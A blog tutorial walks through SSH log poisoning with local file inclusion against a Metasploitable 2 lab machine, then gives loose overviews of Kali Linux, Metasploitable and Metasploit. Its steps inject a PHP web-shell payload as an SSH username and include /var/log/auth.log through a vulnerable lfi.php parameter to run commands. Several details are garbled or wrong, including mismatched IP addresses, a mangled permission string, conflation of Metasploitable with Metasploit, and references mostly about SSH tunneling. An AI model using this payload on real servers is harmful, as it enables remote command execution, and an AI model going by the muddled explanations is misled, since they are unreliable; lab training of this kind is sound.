LFI

It is important to get to know a great method to exploit a web server which essentially suffers from local file inclusion (LFI). Let’s assume we are working on a Metasploitable 2 target and the operating system to run the attack is Kali Linux.

LFI

The following steps explain how one can perform this process on Kali Linux:

  1. Open the Kali Linux terminal.
  2. Connect the target through using SSH service. The following command can be in a great use then
    ssh [email protected]
  3. Check the permission of auth.log file beforehand using the following command
    ls -l /var/log/auth.log
  4. Most of the time the auth.log file appears to have the read-write permission. They should appear like the following:
    -rw-r—r—r—syslog adm …...
  5. We can now have access to the file and read all read all its logs through the following command:
    tail -f /var/log/auth.log
  6. We can walk through the logs and check the specific logs of the user named “mfsadmin”.
  7. Now, let’s attempt to connect to the web server using a counterfeit username. One can use the following command for an invalid login
    ssh [email protected]
  8. The permission should now be denied and shown clearly as follows
    "Permission denied, please try again."

    LFI

  9. Then, get back to the auth.log file and ensure whether such fake or invalid attempt has been recorded or not. It should show that such invalid user tried to get access. The following should display if the user used the IP address of 192.18.1.104
    "Failed Password for invalid user hacker from 192.168.1.104 port 56566 ssh2"
  10. This means that a login whether a passed one or an invalid one, it will get recorded and shown inside the logs. Then, let’s now try passing a PHP code as an invalid user and see how the reaction of such deed will be. The following command provides a PHP invalid user login attempt.
    ssh ‘<?php system($_GET[‘c’]); ?>’@192.168.1.105
  11. Then, get back again to the auth.log file and make sure whether such fake or invalid attempt has been recorded or not. It should show that such invalid user tried to get access. The following should display if the user used the IP address of 192.18.1.104
    "Failed Password for invalid user  <?php system($_GET[‘c’]); ?> from 192.168.1.104 port 49642 ssh2
  12. Let’s assume that you have previously created LFI and now we try to browse to it using the following link:
    192.168.1.105/lfi/lfi.php
  13. An error will appear looking like local file inclusion vulnerability.
  14. The auth.log file should get included as a parameter now through the following URL inside the browser:
    192.168.1.105/lfi/lfi.php?file=/var/log/auth.log
  15. Note that a warning will display, with the following text:
    Warning cannot execute a blank command
  16. Let’s discuss what this actually means. The PHP code which previously contained the CMD comment has already been injected. Any command can then get sent as a parameter now.
  17. Let’s now browse into
     "192.168.1.105/lfi/lfi.php?file=/var/log/auth.log&c=ps"
    

    this will dump the data of auth.log besides executing a comment given through cmd

  18. Let’s now browse into
     "192.168.1.105/lfi/lfi.php file=/var/log/auth.log&c=pwd". 
    

    This way, the results can display inside the window.

What is Kali Linux? 

One of the most important security tools to understand and work on very well is, in fact, Kali Linux. But let’s discuss its benefits in a nutshell.

LFI

⦁ Penetration testing and digital forensics always consider such tool as an essential one for their purposes.
⦁ It provides its user with a variety of tools and functions which fall into thirteen categories:
⦁ Information Gathering such as Dmitry
⦁ Vulnerability Analysis like Inguma
⦁ Tools for exploitation as Metasploit Framework
⦁ Wireless Attacks like WIFI Honey
⦁ Forensics such as Binwalk
⦁ Web Applications like Skipfish
⦁ Stress testing like FunkLoad
⦁ Sniffing and Spoofing as Wireshark
⦁ Password attacks like done by TrueCrack
⦁ Maintaining Access such as Intersect
⦁ Hardware hacking performed by dex2jar for instance
⦁ Reverse Engineering that can for instance use Apktool
⦁ Reporting tools as MagicTree

What is Metasploitable?

LFI

Basically, Metasploitable is a vulnerable machine which is intended to be used for the sake of purposes such as being trained, test an exploit or even general target practice. The unique aspect about Metasploit is that it has the capability to check vulnerabilities on the layer of the operating system and network services, not merely the applications layer.

Metasploitable 2 is like a good bag which contains a bunch of security tools such as Metasploit. A production environment usually has Metasploit 2 to help them with the process of examining and practicing the exploits of vulnerabilities.

Metasploitable 3 is even a newer version of Metasploitable. It is a virtual machine essentially built from the ground up with a lot of security vulnerabilities.  Through such version, Metasploit is the security tool utilized to test exploits. The BSD-style license is the one under which Metasploitable3 got released originally.

The following are requirements to run Metasploitable:

  1. An operating system which is capable of running all of the required applications listed below.
  2. VT-x/AMD-V Supported Processor recommended
  3. 65 GB Available space on drive
  4. 4.5 GB RAM

So we have mentioned that Metasploitable basically uses Metasploit in the first place. Let’s talk in the last few lines about Metasploit in fact.

LFI

The Metasploit Project is a computer security project that shows the vulnerabilities and aids in Penetration Testing. Penetration testing refers to an authorized simulated attack on computer system. It looks for security weaknesses, and Instruction Detection System (IDS) signature, which on the other hand monitors a network or systems for malicious activities. The most related sub-project is the famous open source Metasploit Framework, which is the most common exploit development framework in the world. I will elaborate on this framework idea later on in this article.

Finally, one could use Metasploit to perform some legitimate and unauthorized accesses and activities on computer systems. In this regard, it is no different from any other commercial similar products such as Immunity’s Canvas or Core Security Technologies. Metasploit, however, is commonly applicable in breaking into remote systems or test for a computer system vulnerability.

References

http://www.hackingarticles.in/beginner-guide-ssl-tunneling-dynamic-tunneling/

http://www.hackingarticles.in/perform-local-ssh-tunneling/

https://en.wikipedia.org/wiki/Tunneling_protocol

https://en.wikipedia.org/wiki/SOCKS

https://en.wikipedia.org/wiki/Comparison_of_proxifiers

https://en.wikipedia.org/wiki/TUN/TAP

http://www.hackingarticles.in/perform-remote-tunneling/

http://www.hackingarticles.in/beginner-guide-ssl-tunneling-dynamic-tunneling/

http://linux.byexamples.com/archives/115/ssh-dynamic-tunneling/

https://ypereirareis.github.io/blog/2016/09/19/ssh-tunnel-local-remote-port-forwarding/

https://coderwall.com/p/pmf0tw/understand-local-remote-and-dynamic-ssh-tunneling

http://www.hackingarticles.in/time-scheduling-ssh-port/

http://www.hackingarticles.in/web-server-exploitation-ssh-log-poisoning-lfi/

http://www.hackingarticles.in/metasploitable-3-exploitation-using-brute-forcing-ssh/

http://www.hackingarticles.in/secure-port-using-port-knocking/

https://chamibuddhika.wordpress.com/2012/03/21/ssh-tunnelling-explained/

https://en.wikipedia.org/wiki/RealVNC

https://nmap.org/

http://resources.infosecinstitute.com/metasploitable-2-walkthrough/#gref

https://www.vulnhub.com/entry/metasploitable-2,29/

https://github.com/rapid7/metasploitable3

SHARE
Previous articleInfoSec Addicts Saturday Hackathon
Next articleHow to do SSH port forwarding on Windows?

LEAVE A REPLY

Please enter your comment!
Please enter your name here